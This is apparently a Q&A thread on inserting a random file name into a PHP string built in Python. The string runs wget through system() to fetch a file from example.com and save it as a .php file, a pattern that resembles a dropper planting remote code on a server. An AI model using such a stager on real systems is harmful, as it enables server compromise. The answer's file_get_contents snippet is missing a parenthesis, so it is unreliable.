# Pass variable name on phpsystem wget

Tags: python

```
file = random_file(10)+'.php'
```

Now i have fixed name file php

```
upfil = '<?php system("wget http://example.com/file.txt -O info.php"); ?>'
```

but i need to edit it with generated file name from file = random_file(10)+'.php

```
upfil = '<?php system("wget http://example.com/file.txt -O {file}"); ?>'
```

How i can do it please ?

Comment: That's crazy.  First, why are you creating PHP code in Python?   What is the use case?  Second, there are many ways to fetch a web page in PHP without calling out to an external command.  What you need in this example is an `f` just before the string:  `upfile = f'<?php...'`, but there are better ways.

Answer (score 1):

Substitution in Python is done with f-strings:

```
upfil = f'<?php system("wget http://example.com/file.txt -O {file}"); ?>'
```

But consider using a built-in PHP function:

```
upfif = f'<?php $data=file_get_contents("http://example.com/file.txt"); file_put_contents("{file}", $data;?>'
```